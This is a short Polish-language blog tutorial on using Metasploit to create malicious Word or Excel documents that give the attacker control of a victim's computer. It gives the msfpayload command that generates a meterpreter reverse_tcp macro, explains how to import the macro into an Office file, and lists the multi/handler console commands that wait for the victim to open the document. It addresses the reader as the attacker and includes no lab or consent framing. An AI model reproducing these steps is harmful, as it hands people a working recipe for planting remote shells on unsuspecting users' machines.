Metasploit i tworzenie zarażonych dokumentów office
Tym razem chciałbym rozpisać się lekko na temat użycia platformy Metasploit do zdobywania kontroli nad komputerami poprzez popularne dokumenty word/excel.
Jest jedno ograniczenie – nasz cel musi uruchomić spreparowany odpowiednio przez nas dokument z włączoną obsługą makr!
Skoro już wiemy o ograniczeniu to do dzieła … Zakładam, że:
- macie zainstalowaną najnowszą wersję Metasploit
- macie zainstalowanego Ruby (http://rubyinstaller.rubyforge.org/wiki/wiki.pl)
- korzystacie z systemu Windows (wbrew pozorom pod Windows jest trudniej;)
Tworzenie pliku skryptu Visual Basic
Cała koncepcja tworzenia zarażonego dokumentu opiera się na umieszczeniu w nim odpowiedniego kodu. W naszym wypadku będzie to meterpreter (w skrócie – program który pozwala nam później na komunikację z zarażonym komputerem).
ruby msfpayload windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=8888 V > macro.bas
Polecenie to wywołujemy w katalogu gdzie siedzi msf32 (np. pod Vistą może to być c:usersnazwa_naszego_profiluAppDataLocalmsf32.
A teraz przeanalizujmy je po kolei:
- msfpayload windows/meterpreter/reverse_tcp – w tej części mówimy skryptowi msfpayload „słuchaj, użyj meterpretera, który połączy się z twoim komputerem po uruchomieniu na komputerze ofiary”
- LHOST to adres routowalny (czyli zewnętrzny) na którym będziemy nasłuchiwać połączenia od komputera ofiary, LPORT to port który musimy mieć otwarty i gotowy do akcji.
- > macro.vba – plik wynikowy
No i już mamy 1/3 roboty za nami
Dołączanie skryptu do dokumentu Office
Ogólnie ten etap sprowadza się do uruchomienia worda/excela, dotarcia do edytora Visual Basic i dodania skryptu który stworzyliśmy poprzez file->import file.
Za nami już ponad połowa drogi ….
Uruchomienie programu czekającego na połączenie
Już stworzyliśmy dokument, który połączy się z naszym komputerem po uruchomieniu. Musimy rozwiązać ostatni problem, czyli jak odebrać to połączenie? Ktoś dzwoni a nie mamy jeszcze uruchomionego telefonu … Teraz to zmienimy.
Wystarczy uruchomić Metasploit GUI (odpowiednie skróty powinny się zrobić w start menu po instalacji). Wybieramy z górnego menu window->console (lub skrót klawiszowy ctrl+o).
Teraz uruchamiamy nasz telefon.Do tego użyjemy kilku poleceń które wpisujemy po kolei:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST XXXX
set LPORT 8888
show options (pokaże opcje – sprwadź czy wszystko gra)
exploit
I pozostaje tylko czekać aż ktoś uruchomi nasz dokument …
Najnowsze komentarze